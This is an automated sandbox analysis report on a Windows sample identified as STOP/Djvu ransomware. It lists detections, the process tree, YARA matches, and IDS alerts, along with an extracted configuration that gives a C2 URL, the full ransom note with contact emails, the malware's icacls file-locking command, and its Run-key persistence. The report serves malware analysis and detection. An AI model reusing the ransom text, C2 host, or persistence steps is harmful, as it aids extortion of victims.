Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
66d5df681876c_file010924.exe

Overview

General Information

Sample name:66d5df681876c_file010924.exe
Analysis ID:1503035
MD5:7972b08246e568495d9d116fc2d0b159
SHA1:3e12225494f08369858453fd9fc7481b4f788165
SHA256:2a6c90c8db27e6ac04c7e339dfe4b3c2d47a292bcf6fc1c5b4e0ae62fc81ff84
Tags:exe
Infos:

Detection

Babuk, Djvu
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Detected unpacking (overwrites its own PE header)
Found malware configuration
Found ransom note / readme
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Babuk Ransomware
Yara detected Djvu Ransomware
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Infects executable files (exe, dll, sys, html)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies existing user documents (likely ransomware behavior)
Tries to harvest and steal browser information (history, passwords, etc)
Writes a notice file (html or txt) to demand a ransom
Writes many files with high entropy
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to dynamically determine API calls
Contains functionality to launch a program with higher privileges
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to query network adapater information
Contains functionality to read the PEB
Contains functionality to record screenshots
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Extensive use of GetProcAddress (often used to hide API calls)
Found evasive API chain (may stop execution after checking a module file name)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Sigma detected: CurrentVersion Autorun Keys Modification
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses cacls to modify the permissions of files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 66d5df681876c_file010924.exe (PID: 6228 cmdline: "C:\Users\user\Desktop\66d5df681876c_file010924.exe" MD5: 7972B08246E568495D9D116FC2D0B159)
    • 66d5df681876c_file010924.exe (PID: 6476 cmdline: "C:\Users\user\Desktop\66d5df681876c_file010924.exe" MD5: 7972B08246E568495D9D116FC2D0B159)
      • icacls.exe (PID: 4480 cmdline: icacls "C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8" /deny *S-1-1-0:(OI)(CI)(DE,DC) MD5: 2E49585E4E08565F52090B144062F97E)
      • 66d5df681876c_file010924.exe (PID: 1512 cmdline: "C:\Users\user\Desktop\66d5df681876c_file010924.exe" --Admin IsNotAutoStart IsNotTask MD5: 7972B08246E568495D9D116FC2D0B159)
        • 66d5df681876c_file010924.exe (PID: 6544 cmdline: "C:\Users\user\Desktop\66d5df681876c_file010924.exe" --Admin IsNotAutoStart IsNotTask MD5: 7972B08246E568495D9D116FC2D0B159)
  • 66d5df681876c_file010924.exe (PID: 4244 cmdline: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe --Task MD5: 7972B08246E568495D9D116FC2D0B159)
    • 66d5df681876c_file010924.exe (PID: 1424 cmdline: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe --Task MD5: 7972B08246E568495D9D116FC2D0B159)
  • 66d5df681876c_file010924.exe (PID: 7864 cmdline: "C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe" --AutoStart MD5: 7972B08246E568495D9D116FC2D0B159)
    • 66d5df681876c_file010924.exe (PID: 7900 cmdline: "C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe" --AutoStart MD5: 7972B08246E568495D9D116FC2D0B159)
  • 66d5df681876c_file010924.exe (PID: 8116 cmdline: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe --Task MD5: 7972B08246E568495D9D116FC2D0B159)
    • 66d5df681876c_file010924.exe (PID: 8144 cmdline: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe --Task MD5: 7972B08246E568495D9D116FC2D0B159)
  • 66d5df681876c_file010924.exe (PID: 7172 cmdline: "C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe" --AutoStart MD5: 7972B08246E568495D9D116FC2D0B159)
    • 66d5df681876c_file010924.exe (PID: 6912 cmdline: "C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe" --AutoStart MD5: 7972B08246E568495D9D116FC2D0B159)
  • 66d5df681876c_file010924.exe (PID: 7932 cmdline: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe --Task MD5: 7972B08246E568495D9D116FC2D0B159)
    • 66d5df681876c_file010924.exe (PID: 7900 cmdline: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe --Task MD5: 7972B08246E568495D9D116FC2D0B159)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
BabukBabuk Ransomware is a sophisticated ransomware compiled for several platforms. Windows and ARM for Linux are the most used compiled versions, but ESX and a 32bit old PE executable were observed over time. as well It uses an Elliptic Curve Algorithm (Montgomery Algorithm) to build the encryption keys.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.babuk
NameDescriptionAttributionBlogpost URLsLink
STOP, DjvuSTOP Djvu Ransomware it is a ransomware which encrypts user data through AES-256 and adds one of the dozen available extensions as marker to the encrypted file's name. It is not used to encrypt the entire file but only the first 5 MB. In its original version it was able to run offline and, in that case, it used a hard-coded key which could be extracted to decrypt files.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stop
{"Download URLs": [""], "C2 url": "http://cajgtus.com/test1/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284d\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0874PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\dell\\", "E:\\Intel\\", "E:\\MSOCache\\", "E:\\Program Files\\", "E:\\Program Files (x86)\\", "E:\\Games\\", "F:\\Users\\%username%\\AppData\\Roaming\\", "F:\\Users\\%username%\\AppData\\Local\\", "F:\\Windows\\", "F:\\PerfLogs\\", "F:\\ProgramData\\Desktop\\", "F:\\ProgramData\\Microsoft\\", "F:\\Users\\Public\\", "F:\\$Recycle.Bin\\", "F:\\$WINDOWS.~BT\\", "F:\\dell\\", "F:\\Intel\\"], "Public Key": "-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAsZOJbLC8rdQ3RNFdWJ9l\\\\nsRHwDxjXZCN4K9IEo3ccj2X7KVzvLXJ\\/I+jMWoFDgbTA5TMMDPMhlSykGYr1rbX9\\\\ntDxs5EL7FC3R6jbLzQ+QVdvG2Slvd1aEiSAhkrB6Z97DC28ixTGkA4aCQKKFT5ge\\\\nSXPpDStS2N3zeiWPCMkOs9RErtxVW9sXoWRAFtBg2kSHTyKEWcRqnxplrJGdVQKU\\\\n0DxDnHDefnxaf\\/3VSRczBwGZlq\\/Mr2bfHM2Mf8JWmYztlmGbjGb\\/\\/oixuuRePxzt\\\\n6xgozgVrC64HnagNFyODdlk2w\\/BpJWXIbgivZ0kR40Ll3NEAl3Z26cIkIc6pAJ3s\\\\nfwIDAQAB\\\\n-----END PUBLIC KEY-----"}
SourceRuleDescriptionAuthorStrings
00000020.00000002.2444319207.0000000002332000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
0000001C.00000002.1624704973.000000000228E000.00000040.00000020.00020000.00000000.sdmpWindows_Trojan_RedLineStealer_ed346e4cunknownunknown
  • 0x798:$a: 55 8B EC 8B 45 14 56 57 8B 7D 08 33 F6 89 47 0C 39 75 10 76 15 8B
00000018.00000002.1506583704.0000000002380000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
    00000018.00000002.1506583704.0000000002380000.00000040.00001000.00020000.00000000.sdmpWindows_Ransomware_Stop_1e8d48ffunknownunknown
    • 0x105ac8:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
    • 0xe38f:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
    00000020.00000002.2444379499.00000000023D0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
      Click to see the 47 entries
      SourceRuleDescriptionAuthorStrings
      33.2.66d5df681876c_file010924.exe.400000.0.raw.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
        33.2.66d5df681876c_file010924.exe.400000.0.raw.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
        • 0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
        • 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
        33.2.66d5df681876c_file010924.exe.400000.0.raw.unpackMALWARE_Win_STOPDetects STOP ransomwareditekSHen
        • 0xffe88:$x1: C:\SystemID\PersonalID.txt
        • 0x100334:$x2: /deny *S-1-1-0:(OI)(CI)(DE,DC)
        • 0xffcf0:$x3: e:\doc\my work (c++)\_git\encryption\
        • 0x105b28:$x3: E:\Doc\My work (C++)\_Git\Encryption\
        • 0x1002ec:$s1: " --AutoStart
        • 0x100300:$s1: " --AutoStart
        • 0x103f48:$s2: --ForNetRes
        • 0x103f10:$s3: --Admin
        • 0x104390:$s4: %username%
        • 0x1044b4:$s5: ?pid=
        • 0x1044c0:$s6: &first=true
        • 0x1044d8:$s6: &first=false
        • 0x1003f4:$s7: delself.bat
        • 0x1043f8:$mutex1: {1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}
        • 0x104420:$mutex2: {FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
        • 0x104448:$mutex3: {36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
        2.2.66d5df681876c_file010924.exe.400000.0.raw.unpackJoeSecurity_DjvuYara detected Djvu RansomwareJoe Security
          2.2.66d5df681876c_file010924.exe.400000.0.raw.unpackWindows_Ransomware_Stop_1e8d48ffunknownunknown
          • 0x105b28:$a: E:\Doc\My work (C++)\_Git\Encryption\Release\encrypt_win_api.pdb
          • 0xd9ef:$b: 68 FF FF FF 50 FF D3 8D 85 78 FF FF FF 50 FF D3 8D 85 58 FF
          Click to see the 73 entries

          System Summary

          barindex
          Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: "C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exe" --AutoStart, EventID: 13, EventType: SetValue, Image: C:\Users\user\Desktop\66d5df681876c_file010924.exe, ProcessId: 6476, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\SysHelper
          Timestamp:2024-09-02T18:21:06.383076+0200
          SID:2803274
          Severity:2
          Source Port:49701
          Destination Port:443
          Protocol:TCP
          Classtype:Potentially Bad Traffic
          Timestamp:2024-09-02T18:21:08.618997+0200
          SID:2803274
          Severity:2
          Source Port:49702
          Destination Port:443
          Protocol:TCP
          Classtype:Potentially Bad Traffic
          Timestamp:2024-09-02T18:21:13.757401+0200
          SID:2036335
          Severity:1
          Source Port:80
          Destination Port:49706
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:2024-09-02T18:21:13.756183+0200
          SID:2803274
          Severity:2
          Source Port:49706
          Destination Port:80
          Protocol:TCP
          Classtype:Potentially Bad Traffic
          Timestamp:2024-09-02T18:21:13.756183+0200
          SID:2833438
          Severity:1
          Source Port:49706
          Destination Port:80
          Protocol:TCP
          Classtype:Malware Command and Control Activity Detected
          Timestamp:2024-09-02T18:21:20.656245+0200
          SID:2803274
          Severity:2
          Source Port:49712
          Destination Port:443
          Protocol:TCP
          Classtype:Potentially Bad Traffic
          Timestamp:2024-09-02T18:21:13.757094+0200
          SID:2036335
          Severity:1
          Source Port:80
          Destination Port:49705
          Protocol:TCP
          Classtype:A Network Trojan was detected
          Timestamp:2024-09-02T18:23:06.711561+0200
          SID:2803274
          Severity:2
          Source Port:49731
          Destination Port:443
          Protocol:TCP
          Classtype:Potentially Bad Traffic
          Timestamp:2024-09-02T18:21:33.150577+0200
          SID:2803274
          Severity:2
          Source Port:49725
          Destination Port:443
          Protocol:TCP
          Classtype:Potentially Bad Traffic
          Timestamp:2024-09-02T18:21:44.860802+0200
          SID:2803274
          Severity:2
          Source Port:49727
          Destination Port:443
          Protocol:TCP
          Classtype:Potentially Bad Traffic
          Timestamp:2024-09-02T18:21:10.605985+0200
          SID:2803274
          Severity:2
          Source Port:49703
          Destination Port:443
          Protocol:TCP
          Classtype:Potentially Bad Traffic
          Timestamp:2024-09-02T18:21:13.756182+0200
          SID:2803274
          Severity:2
          Source Port:49705
          Destination Port:80
          Protocol:TCP
          Classtype:Potentially Bad Traffic
          Timestamp:2024-09-02T18:21:13.756182+0200
          SID:2036334
          Severity:1
          Source Port:49705
          Destination Port:80
          Protocol:TCP
          Classtype:A Network Trojan was detected

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: http://cajgtus.com/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200Avira URL Cloud: Label: malware
          Source: http://cajgtus.com/test1/get.php?pid=3C8DAB0A318E3BBE55D6418C454BF200GtYAvira URL Cloud: Label: malware
          Source: http://cajgtus.com/test1/get.phpjAvira URL Cloud: Label: malware
          Source: http://cajgtus.com/test1/get.phpAvira URL Cloud: Label: malware
          Source: 00000018.00000002.1506583704.0000000002380000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: Djvu {"Download URLs": [""], "C2 url": "http://cajgtus.com/test1/get.php", "Ransom note file": "_readme.txt", "Ransom note": "ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nDo not ask assistants from youtube and recovery data sites for help in recovering your data.\r\nThey can use your free decryption quota and scam you.\r\nOur contact is emails in this text document only.\r\nYou can get and look video overview decrypt tool:\r\nhttps://wetransfer.com/downloads/abe121434ad837dd5bdd03878a14485820240531135509/34284d\r\nPrice of private key and decrypt software is $999.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $499.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nsupport@freshingmail.top\r\n\r\nReserve e-mail address to contact us:\r\ndatarestorehelpyou@airmail.cc\r\n\r\nYour personal ID:\r\n0874PsawqS", "Ignore Files": ["ntuser.dat", "ntuser.dat.LOG1", "ntuser.dat.LOG2", "ntuser.pol", ".sys", ".ini", ".DLL", ".dll", ".blf", ".bat", ".lnk", ".regtrans-ms", "C:\\SystemID\\", "C:\\Users\\Default User\\", "C:\\Users\\Public\\", "C:\\Users\\All Users\\", "C:\\Users\\Default\\", "C:\\Documents and Settings\\", "C:\\ProgramData\\", "C:\\Recovery\\", "C:\\System Volume Information\\", "C:\\Users\\%username%\\AppData\\Roaming\\", "C:\\Users\\%username%\\AppData\\Local\\", "C:\\Windows\\", "C:\\PerfLogs\\", "C:\\ProgramData\\Microsoft\\", "C:\\ProgramData\\Package Cache\\", "C:\\Users\\Public\\", "C:\\$Recycle.Bin\\", "C:\\$WINDOWS.~BT\\", "C:\\dell\\", "C:\\Intel\\", "C:\\MSOCache\\", "C:\\Program Files\\", "C:\\Program Files (x86)\\", "C:\\Games\\", "C:\\Windows.old\\", "D:\\Users\\%username%\\AppData\\Roaming\\", "D:\\Users\\%username%\\AppData\\Local\\", "D:\\Windows\\", "D:\\PerfLogs\\", "D:\\ProgramData\\Desktop\\", "D:\\ProgramData\\Microsoft\\", "D:\\ProgramData\\Package Cache\\", "D:\\Users\\Public\\", "D:\\$Recycle.Bin\\", "D:\\$WINDOWS.~BT\\", "D:\\dell\\", "D:\\Intel\\", "D:\\MSOCache\\", "D:\\Program Files\\", "D:\\Program Files (x86)\\", "D:\\Games\\", "E:\\Users\\%username%\\AppData\\Roaming\\", "E:\\Users\\%username%\\AppData\\Local\\", "E:\\Windows\\", "E:\\PerfLogs\\", "E:\\ProgramData\\Desktop\\", "E:\\ProgramData\\Microsoft\\", "E:\\ProgramData\\Package Cache\\", "E:\\Users\\Public\\", "E:\\$Recycle.Bin\\", "E:\\$WINDOWS.~BT\\", "E:\\del
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeReversingLabs: Detection: 71%
          Source: 66d5df681876c_file010924.exeReversingLabs: Detection: 71%
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeJoe Sandbox ML: detected
          Source: 66d5df681876c_file010924.exeJoe Sandbox ML: detected
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 2_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_0040E870
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 2_2_0040EA51 CryptDestroyHash,CryptReleaseContext,2_2_0040EA51
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 2_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,2_2_0040EAA0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 2_2_0040EC68 CryptDestroyHash,CryptReleaseContext,2_2_0040EC68
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 2_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,2_2_00410FC0
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeCode function: 2_2_00411178 CryptDestroyHash,CryptReleaseContext,2_2_00411178
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_0040E870 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,12_2_0040E870
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_0040EAA0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,_sprintf,CryptDestroyHash,CryptReleaseContext,12_2_0040EAA0
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_00410FC0 CryptAcquireContextW,__CxxThrowException@8,CryptCreateHash,__CxxThrowException@8,lstrlenA,CryptHashData,__CxxThrowException@8,CryptGetHashParam,CryptGetHashParam,__CxxThrowException@8,_memset,CryptGetHashParam,__CxxThrowException@8,CryptGetHashParam,_malloc,CryptGetHashParam,_memset,_sprintf,lstrcatA,CryptDestroyHash,CryptReleaseContext,12_2_00410FC0
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_00411178 CryptDestroyHash,CryptReleaseContext,12_2_00411178
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_0040EA51 CryptDestroyHash,CryptReleaseContext,12_2_0040EA51
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeCode function: 12_2_0040EC68 CryptDestroyHash,CryptReleaseContext,12_2_0040EC68
          Source: 66d5df681876c_file010924.exe, 00000007.00000003.1857302655.00000000006BD000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: -----BEGIN PUBLIC KEY-----memstr_a22face6-e

          Compliance

          barindex
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeUnpacked PE file: 2.2.66d5df681876c_file010924.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeUnpacked PE file: 12.2.66d5df681876c_file010924.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeUnpacked PE file: 21.2.66d5df681876c_file010924.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeUnpacked PE file: 25.2.66d5df681876c_file010924.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeUnpacked PE file: 29.2.66d5df681876c_file010924.exe.400000.0.unpack
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeUnpacked PE file: 33.2.66d5df681876c_file010924.exe.400000.0.unpack
          Source: 66d5df681876c_file010924.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\$WinREAgent\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\$WinREAgent\Scratch\_readme.txtJump to behavior
          Source: C:\Users\user\Desktop\66d5df681876c_file010924.exeFile created: C:\Users\jones\_readme.txtJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeFile created: C:\_readme.txtJump to behavior
          Source: C:\Users\user\AppData\Local\f2d62e47-6455-43f0-a9b7-09a9903ddbb8\66d5df681876c_file010924.exeFile created: C:\Users\user\_readme.txtJump to behavior
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49701 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49702 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49703 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49712 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49725 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49727 version: TLS 1.2
          Source: unknownHTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.7:49731 version: TLS 1.2
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\che\p source: 66d5df681876c_file010924.exe, 00000007.00000003.1874024202.00000000035B6000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1873342035.0000000003596000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1862419723.000000000358D000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1862505786.0000000003598000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1874976893.00000000035C6000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Application Data\Application Data\Application Data\Application Data\Temp\Symbols\ntkrnlmp.pdb\e\ source: 66d5df681876c_file010924.exe, 00000007.00000003.1926069584.000000000386F000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1873929708.0000000003857000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1927184545.0000000003876000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1898829486.000000000383F000.00000004.00000020.00020000.00000000.sdmp, 66d5df681876c_file010924.exe, 00000007.00000003.1874849344.000000000385E000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Users\user\Local Settings\Application Data\Temp\Symbols\winload_prod.pdb\Data\P source: 66d5df681876c_file010924.exe, 00000007.00000003.1449642704.00000000034F2000.00000004.00000020.00020000.00000000.sdmp
